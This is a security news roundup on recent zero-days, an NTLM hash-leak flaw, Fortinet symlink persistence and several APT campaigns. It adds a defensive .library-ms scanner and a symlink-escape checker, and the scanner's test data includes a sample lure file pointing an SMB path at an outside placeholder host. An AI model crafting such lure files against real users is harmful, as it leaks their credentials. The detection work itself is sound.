Apple has released critical security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two zero-day vulnerabilities actively exploited in the wild. The first flaw, CVE-2025-31200, is a memory corruption issue in the Core Audio framework that could allow arbitrary code execution via malicious media files. The second, CVE-2025-31201, is an improper authentication flaw in the RPAC component, potentially enabling attackers to bypass Pointer Authentication protections. Apple has confirmed that the two vulnerabilities have been used in highly targeted attacks.
A recently patched Windows NTLM vulnerability, tracked as CVE-2025-24054, has been exploited in attacks targeting both government and private institutions. The flaw is triggered with minimal user interaction on a malicious .library-ms file, which is enough to make Windows open an SMB session to an attacker-controlled server and hand over the user's NTLMv2 response; that response can then be cracked offline or relayed, enabling spoofing attacks over the network. Within a week of the patch being released, attackers began exploiting the vulnerability in campaigns targeting institutions in Poland and Romania, as reported by Check Point. Researchers observed several campaigns between March 19 and March 25, including some linked to Russian threat actors and APT groups. The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) list. The agency has also flagged a SonicWall SMA100 Appliances OS command injection flaw (CVE-2021-20035) as actively exploited.
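The leak works because a .library-ms file is plain XML and Explorer resolves every UNC path listed under its search connectors as soon as the library is rendered. The scanner below is an added example for this roundup, not tooling from Microsoft or Check Point: it parses the XML, pulls the host out of each UNC target and reports any host that is not on an allow-list of internal file servers. The allow-list and the two sample documents are constructed for illustration.

```python
r"""Scan .library-ms files for search connectors that point at remote SMB hosts.

Added example, not Microsoft's or Check Point's code. A .library-ms file is XML;
when Explorer renders the library it resolves each <url> under <simpleLocation>,
and a UNC path such as \\attacker\share makes Windows open an SMB session and
send the user's NTLMv2 response to that host. Any UNC host outside the
allow-list is therefore reported. Allow-list and samples are constructed.
"""
import re
import xml.etree.ElementTree as ET

LIB_NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
UNC_HOST = re.compile(r"^\\\\([^\\/]+)")  # host component of \\host\share

# Assumption: the internal file servers a library may legitimately reference.
ALLOWED_HOSTS = {"fileserver01", "fileserver01.corp.example"}


def unc_hosts(library_ms_xml: str) -> list:
    """Return the host of every UNC <url> referenced by the library."""
    root = ET.fromstring(library_ms_xml)
    hosts = []
    for url in root.iterfind(".//lib:simpleLocation/lib:url", LIB_NS):
        match = UNC_HOST.match((url.text or "").strip())
        if match:
            hosts.append(match.group(1).lower())
    return hosts


def suspicious_hosts(library_ms_xml: str, allowed=ALLOWED_HOSTS) -> list:
    """UNC hosts not on the allow-list. A non-empty result means opening the
    file would send an NTLM authentication to a host you do not control."""
    return [h for h in unc_hosts(library_ms_xml) if h not in allowed]


# Constructed sample: a library pointing at an internal share.
BENIGN = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Shared Documents</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\fileserver01\\docs</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed sample: the same structure pointing at an outside host
# (203.0.113.10 is a documentation address, not a real attacker server).
MALICIOUS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Shared Documents</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, suspicious_hosts(doc))
```

Run it over attachments extracted from mail or from archives sitting in download folders; the allow-list is the only site-specific part. Blocking outbound TCP 445 to the internet at the perimeter closes the leak path regardless of which file format triggers the authentication.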
Additionally, CISA is advising organizations affected by a possible data breach at Oracle’s Cloud Infrastructure to reset passwords to reduce the risk of credential compromise. CISA has acknowledged reports of potential unauthorized access to a legacy Oracle cloud environment, though the full scope and impact remain unconfirmed. Earlier, news media reported that throughout March and April, Oracle informed its customers privately about multiple security incidents, although the company did not publicly address the matter. Oracle claimed that its Cloud Infrastructure (OCI) was not breached, but acknowledged that a hacker accessed and published user names from two outdated servers not connected to OCI.
Fortinet has issued an advisory alerting users about a post-exploitation technique being used by threat actors to maintain persistent read-only access to previously compromised FortiGate VPN devices, even after the original attack vector was patched. The company said that after exploiting older known vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475), the attackers created a symbolic link between the user filesystem and the root filesystem inside a folder used to serve language files for the SSL-VPN. Because that location was not touched by firmware updates, the link let them keep reading sensitive parts of the device's file system despite the system updates that addressed the original flaws. Fortinet noted that devices on which SSL-VPN was never enabled are not affected.
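The general pattern is a symlink inside a directory that a web server serves statically, resolving to somewhere outside that directory. The POSIX shell function below is an added example, not Fortinet's own detection logic: given a served directory, it lists every symlink beneath it whose resolved target escapes the tree. The webroot path is whatever the reader passes in.

```shell
#!/bin/sh
# Added example, not Fortinet's code: report symlinks under a served directory
# (the first argument) whose resolved target lies outside that directory.
# A web server that serves static files from the tree will happily follow
# such a link, which is the read-only persistence pattern described above.
find_escaping_symlinks() {
    # Canonicalise the base so the prefix comparison below is reliable.
    base=$(cd "$1" 2>/dev/null && pwd -P) || return 2
    # -type l does not follow links, so a link to / is listed, not descended.
    find "$base" -type l 2>/dev/null | while IFS= read -r link; do
        target=$(readlink -f "$link" 2>/dev/null) || target=""
        case "$target" in
            "$base"/*) ;;   # resolves inside the served tree: fine
            *) printf '%s -> %s\n' "$link" "${target:-<dangling>}" ;;
        esac
    done
}
# Usage: find_escaping_symlinks /path/to/webroot
```

On an appliance where the shell is not available, the same check can be done offline against a mounted filesystem image; on general-purpose Linux hosts, `readlink -f` is GNU coreutils or busybox.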
A group of longtime CVE Board members has launched the CVE Foundation, a new non-profit organization aimed at ensuring the long-term stability and independence of the Common Vulnerabilities and Exposures (CVE) Program. The move comes in response to MITRE Vice President Yosry Barsoum's warning that funding for both the CVE and Common Weakness Enumeration (CWE) programs was set to expire on April 16, 2025, potentially disrupting global cybersecurity efforts. In the meantime, CISA said that it extended the option period on the contract to ensure that there will be no lapse in critical CVE services.
A new spear-phishing campaign attributed to Russian state-sponsored hacking group Midnight Blizzard (also known as Cozy Bear or APT29) has been discovered targeting European diplomatic entities, including embassies, according to cybersecurity firm Check Point Research. The campaign, active since January 2025, employs a deceptive email disguised as a wine-tasting event invitation from a spoofed Ministry of Foreign Affairs address. The phishing emails include a malicious link that, when clicked under specific conditions, delivers a ZIP archive titled wine.zip. If the conditions aren't met, the victim is redirected to a legitimate government site, adding credibility to the ruse.
A China-linked cyber espionage group, UNC5174 (aka Uteus or Uetus), has been linked to a new malware campaign targeting Linux systems using a modified variant of the known SNOWLIGHT malware and the open-source remote access tool VShell. At the same time, the Canadian Cyber Centre has warned that it observed increasing levels of Chinese threat actor activity, including activity associated with SALT TYPHOON, targeting network edge routers across critical infrastructure sectors.
Researchers at Trend Micro have uncovered a previously undocumented controller component associated with the BPFDoor backdoor malware involved in ongoing cyber attacks targeting critical sectors across Asia and the Middle East. The controller has been linked to a string of intrusions targeting telecommunications, finance, and retail industries in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt throughout 2024. The campaign is attributed to a well-known cyber espionage group known as Earth Bluecrow, also tracked as DecisiveArchitect, Red Dev 18, and Red Menshen.
A new remote access trojan, dubbed ‘ResolverRAT’, targets organizations in the healthcare and pharmaceutical industries, according to a report released by Morphisec Threat Labs. The malware combines advanced in-memory execution with layered evasion techniques, making it particularly difficult to detect and analyze. Unlike well-known malware families such as Rhadamanthys or Lumma, ResolverRAT comes with a unique loader and payload architecture, while reusing elements from previous campaigns, including phishing infrastructure and binary components.
China has accused the United States National Security Agency (NSA) of orchestrating "advanced" cyberattacks targeting critical infrastructure during the Asian Winter Games held in February 2025. According to China's state-run news agency Xinhua, authorities in the northeastern city of Harbin—where the Games took place—identified three NSA agents allegedly involved in the operation. Xinhua reported that the cyberattacks targeted essential pre-Games systems, including platforms managing athlete registration, arrival and departure logistics, and competition entries. The systems stored a vast trove of sensitive personal data related to participants, staff, and officials.
A threat actor with suspected links to Pakistan, tracked as SideCopy, has expanded its cyberattacks targeting Indian sectors, deploying a range of remote access trojans (RATs), including Xeno RAT, Spark RAT, and a new malware, CurlBack RAT. Recent attacks involved additional RATs like Action RAT, ReverseRAT, and Cheex, which is designed to steal documents and images. The group also used a tool to siphon data from USB drives and a .NET-based Geta RAT that executes up to 30 remote commands.
Palo Alto Networks' Unit 42 uncovered a sophisticated phishing campaign that uses a multi-stage attack chain to deliver malware such as Agent Tesla, Remcos RAT, and XLoader. The attackers employ complex delivery techniques to evade detection and bypass traditional security measures. The campaign uses deceptive emails, disguised as order release requests, to lure victims into opening malicious attachments, ultimately enabling successful payload execution.
A new phishing technique has been observed that specifically targets high-value online accounts, making stolen credentials more usable and the campaign harder to detect. Known as "precision-validating phishing," the technique checks the address a visitor enters against an attacker-held list of pre-harvested targets, typically through a real-time lookup, and serves the credential-harvesting page only when the address is on that list; anyone else, including researchers and automated scanners, is shown an error or redirected, so the kit engages only with verified, legitimate email addresses.
Cisco Talos said it observed the continued global spread of the XorDDoS distributed denial-of-service (DDoS) malware between November 2023 and February 2025. Notably, over 70% of XorDDoS attacks during this period targeted the United States. Analysis of the malware’s multi-layer controller, builder, and binding tools suggests the operators are Chinese-speaking. Talos also uncovered a new, more advanced variant of the controller, dubbed the “VIP version,” which was used to construct a more sophisticated and expansive DDoS botnet.
The Zscaler ThreatLabz team published a two-part series detailing new activity linked to the China-sponsored espionage group Mustang Panda. The investigation revealed updated variants of the ToneShell backdoor and a previously undocumented tool called StarProxy. ToneShell now includes enhancements to its FakeTLS command-and-control (C2) protocol and client ID handling. StarProxy, a new lateral movement tool, also uses the FakeTLS protocol to proxy attacker traffic. Mustang Panda continues to focus on entities in Myanmar and typically employs DLL sideloading techniques using RAR archives bundled with legitimate, signed binaries.
Zak Coyne, 23, from Huddersfield, has been sentenced to eight-and-a-half years in prison by Manchester Crown Court for running LabHost, a criminal service launched in 2021 that enabled cybercriminals to create phishing websites to steal personal and financial information. Coyne pleaded guilty to several cybercrime charges, including supplying articles for fraud, encouraging fraud, and transferring criminal property.
Ukrainian police have dismantled a criminal group that remotely accessed the devices of state enforcement officers and private notaries to illegally lift property restrictions for a fee. The group, including a private enforcement officer, used phishing emails containing malware to compromise victims' devices, gaining access to digital signatures and passwords. Their goal was to facilitate illegal property transfers by deregistering and re-registering movable and immovable property. The group operated discreetly, using specialized tools and working in remote areas to avoid detection.
Behrouz Parsarad, the founder and operator of Nemesis Market, a dark web marketplace for illegal drugs and criminal services, has been charged in the United States. Launched in March 2021, Nemesis Market quickly gained traction, reaching over 150,000 users and 1,100 vendor accounts worldwide. Between 2021 and 2024, it processed more than 400,000 orders, including significant quantities of illegal drugs such as methamphetamine, cocaine, fentanyl, heroin, and oxycodone. The marketplace also facilitated the sale of stolen financial information, fraudulent IDs, counterfeit currencies, and malware.
Minh Phuong Ngoc Vong, a 40-year-old man from Bowie, Maryland, pleaded guilty to defrauding 13 US companies by securing remote IT jobs and allowing individuals in China to perform the work. Vong falsely claimed to have a Bachelor’s degree and 16 years of software development experience to land the positions. He installed remote access software to let foreign nationals, including one in Shenyang, China, work under his name. From March to July 2023, Vong facilitated over $28,000 in wages from a Virginia-based company, which he shared with the overseas conspirators. Vong engaged in similar schemes between 2021 and 2024.